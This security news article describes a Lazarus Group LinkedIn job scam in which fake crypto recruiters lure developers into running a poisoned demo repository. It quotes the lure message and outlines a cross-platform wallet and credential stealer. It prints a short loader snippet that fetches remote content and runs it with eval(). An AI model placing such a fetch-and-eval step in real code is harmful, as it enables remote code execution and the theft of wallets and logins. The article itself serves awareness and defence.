The North Korea-linked Lazarus Group (aka APT 38) has been targeting organizations through a LinkedIn recruiting scam.
Through this scam threat actors behind Lazarus Group aim to capture the credentials and deliver malware.
This malicious operation exploits the trust in professional networks.
.png
)
While researchers at BitDefender identified that the threat actors do so by using enticing job offers to lure unsuspecting individuals into downloading malicious code.
The Setup: A Tempting Job Offer
The scam begins with an enticing message, often involving opportunities in decentralized cryptocurrency exchanges.
The promise of remote work, part-time flexibility, and attractive compensation can be particularly appealing.
Here’s an example of such a message:-
Message:
“Hi, Happy new Year! Crypto is alive again! In this opportunity, I’d like to take this opportunity to update DEX platform. The final MVP is already done, and I’m looking to bring in more developers to launch our first product by May this year. I truly value your expertise and would like to invite you to discuss this project with us as a React/front-end developer. This position is remote and can be full/part-time if hired. I’d like to offer compensation in the form of tokens or very flexible salary of $85-$110/hr. Looking forward to seeing you in our Project. Thanks,”
Once interest is expressed, the scammer requests a CV or a personal GitHub repository link. These requests seem innocent but can be used to harvest personal data or legitimize the interaction.
- CV Review
- Skill Test and Technical Interview
- Compensation Meeting with CEO
After receiving the requested information, the scammer shares a repository containing the “minimum viable product” (MVP) of the project. This includes a document with questions that require executing the demo to answer.
// Example of malicious code execution
//Get Cookie
Jexports.getCookie = asyncErrorHandler(async (req, res, next) => {
const rs = await axios.get('https://api.example.com/cookie');
eval(rs.data.cookie);
});.webp)
The code appears harmless at first glance but is heavily obfuscated and dynamically loads malicious code from a third-party endpoint.
.webp)
The malware is a cross-platform info-stealer capable of targeting Windows, macOS, and Linux.
It specifically targets popular cryptocurrency wallets by identifying browser extensions with specific IDs, such as MetaMask, BNB Chain Wallet, and others.
.webp)
Once deployed, the malware collects important files related to these extensions, browser login data, and exfiltrates this information to a malicious IP address.
The malware downloads and executes a Python script named main99_65.py, which sets the stage for additional malicious activities.
This script decompresses and decodes itself recursively, revealing a hidden script that downloads three Python modules:-
- mlip.py: Hooks keyboard events, monitors clipboard changes for crypto-related data, and sends stolen data to a remote server.
- pay.py: Reports system/network info, exfiltrates valuable files, and maintains a persistent communication channel.
- bow.py: Extracts sensitive browser data and runs the Tsunami Injector script.
The objectives of the Lazarus Group extend beyond personal data theft, aiming to compromise sensitive corporate information.
To protect yourself from such scams, it’s important to be vigilant for red flags, suspicious repositories that do not have proper documentation or contributions, and poor communication characterized by frequent spelling errors and reluctance to provide alternative contact methods.
The best practices include avoiding the execution of unverified code, verifying the authenticity of job offers, and maintaining a cautious mindset when scrutinizing unsolicited messages and requests for personal information.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
